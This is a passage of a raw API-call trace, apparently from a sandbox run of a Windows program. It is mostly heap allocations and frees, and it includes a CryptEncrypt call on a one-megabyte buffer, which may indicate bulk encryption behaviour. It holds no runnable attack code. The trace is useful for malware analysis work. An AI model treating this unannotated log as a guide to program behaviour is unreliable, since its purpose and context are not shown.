hHeap=0x970000) returned 1 [0190.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0190.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0190.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0190.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0190.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0190.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0190.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0190.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0190.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0190.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0190.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0190.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0190.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0190.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0190.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0190.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0190.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0190.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0190.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0190.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0190.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0190.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0190.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0190.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0190.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0190.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0190.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0190.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0190.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0190.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0190.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0190.591] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0190.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0190.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0190.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0190.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0190.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0190.592] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0190.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0190.592] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0190.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0190.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0190.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0190.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0190.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0190.592] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0190.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0190.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0190.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0190.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0190.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0190.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0190.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0190.592] CharLowerBuffW (in: lpsz="byte[1048576]", cchLength=0xd | out: lpsz="byte[1048576]") returned 0xd [0190.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0190.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0190.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0190.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0190.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0190.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0190.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0190.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0190.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0190.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0190.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0190.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0190.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0190.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0190.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0190.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0190.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0190.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0190.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0190.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0190.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0190.612] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0190.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0190.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0190.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0190.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0190.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0190.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0190.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0190.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0190.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0190.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x1296020 | out: hHeap=0x970000) returned 1 [0190.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0190.772] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0190.772] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.772] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0190.903] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0190.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50b90, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0190.904] CryptEncrypt (in: hKey=0xa86f50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x118d020*, pdwDataLen=0x8cef60*=0x100000, dwBufLen=0x100000 | out: pbData=0x118d020*, pdwDataLen=0x8cef60*=0x100000) returned 1 [0191.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0191.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0191.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0191.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0191.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0191.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0191.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0191.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0191.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0191.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0191.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0191.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0191.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0191.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0191.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0191.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0191.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0191.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0191.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0191.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0191.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0191.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0191.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0191.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0191.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0191.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0191.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0191.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0191.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0191.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0191.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0191.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0191.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0191.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0191.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0191.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0191.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0191.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0191.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0191.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0191.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0191.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0191.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0191.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0191.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0191.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0191.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0191.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0191.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0191.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0191.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0191.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0191.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0191.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0191.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0191.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0191.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0191.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0191.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0191.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0191.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0191.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0191.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0191.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0191.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0191.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0191.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0191.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0191.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0191.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0191.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0191.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0191.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0191.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0191.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0191.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0191.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0191.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0191.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0191.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0191.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0191.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0191.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0191.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0191.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0191.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0191.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0191.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0191.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0191.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0191.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0191.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0191.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0191.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0191.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0191.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0191.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0191.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0191.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0191.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0191.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0191.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0191.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0191.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0191.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0191.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0191.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0191.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0191.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0191.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0191.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0191.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0191.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0191.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0191.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0191.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0191.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0191.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0191.165] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0191.165] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0191.166] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0191.166] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0191.166] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0191.166] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0191.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0191.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0191.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0191.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0191.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0191.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0191.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0191.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0191.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0191.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0191.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0191.166] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, 